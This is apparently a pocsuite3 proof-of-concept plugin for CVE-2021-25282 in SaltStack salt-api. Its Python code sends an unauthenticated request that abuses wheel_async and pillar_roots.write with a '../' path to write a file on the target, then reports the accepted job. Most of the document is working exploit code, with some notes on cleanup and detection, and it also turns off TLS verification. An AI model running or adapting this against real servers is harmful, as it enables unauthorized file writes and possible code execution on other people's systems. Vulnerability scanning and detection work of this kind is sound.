POC
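#!/usr/bin/env python
# coding: utf-8
"""pocsuite3 plugin that probes salt-api for CVE-2021-25282.

The probe sends one unauthenticated POST to ``/run`` asking the
``wheel_async`` client to run ``pillar_roots.write`` with a ``../`` path.

Notes for whoever runs or triages this check:

* It is not read-only. On an affected target the marker string is written
  to the traversed path (``/tmp/vuln``) on the salt-api host; remove that
  file after testing.
* A hit only means the API accepted the job and returned a tag and jid.
  The script never reads the file back, so confirm the write on the host.
* The plugin metadata lists affected versions as ``< 3002.5``.
* Requests of this shape (POST ``/run`` with ``"client": "wheel_async"``,
  ``"fun": "pillar_roots.write"`` and a ``path`` containing ``../``) are
  what a detection rule in front of salt-api should match.
"""

from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
import re
import json


class TestPOC(POCBase):
    """Plugin metadata plus the verify/attack entry points pocsuite3 calls."""

    vulID = '000'
    version = '1'
    author = 'zhzyker'
    vulDate = '2021-02-27'
    createDate = '2021-03-02'
    updateDate = '2021-03-02'
    references = ['https://github.com/zhzyker/vulmap']
    name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
    appName = 'SaltStack'
    appVersion = '< 3002.5'
    # NOTE(review): `name` describes a file write while vulType and desc
    # describe code execution; kept as published.
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = ''' Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api. '''

    def _verify(self):
        """Send the probe and record URL, job id and path when it is accepted.

        Returns:
            The Output built by parse_output(); it reports failure when no
            port produced a matching response.
        """
        result = {}
        pr = urlparse(self.url)
        # Port from the target URL when present, otherwise 8000.
        ports = [pr.port] if pr.port else [8000]
        timeout = 10
        path = "../../../../../../../../../tmp/vuln"
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'Content-Type': 'application/json'
        }
        # Serialised once; the body is identical for every port.
        payload = json.dumps({
            'eauth': 'auto',
            'client': 'wheel_async',
            'fun': 'pillar_roots.write',
            'data': 'vuln_cve_2021_25282',
            'path': path
        })
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            url = target + "/run"
            try:
                # verify=False turns off TLS certificate validation, so the
                # response is not authenticated as coming from the target.
                r = req.post(url, headers=headers, data=payload,
                             timeout=timeout, verify=False)
                # Parse the body once and take the first entry of "return".
                first = list(json.loads(r.text)["return"])[0]
                tag = first["tag"]
                jid = first["jid"]
                # Hit condition: a wheel event tag that embeds the job id.
                # This shows the job was accepted, not that the file exists.
                if "salt/wheel" in tag and jid in tag:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = url
                    result['VerifyInfo']['JID'] = jid
                    result['VerifyInfo']['UPLOAD'] = path
                    break
            except Exception:
                # Connection errors, non-JSON bodies and responses without
                # return/tag/jid all count as "no hit" for this port.
                # KeyboardInterrupt and SystemExit are no longer swallowed.
                continue
        return self.parse_output(result)

    def _attack(self):
        """Attack mode is the same probe as verify mode."""
        return self._verify()

    def parse_output(self, result):
        """Wrap `result` in an Output: success when non-empty, else failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)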
版权信息
POC由【之乎者也】提供。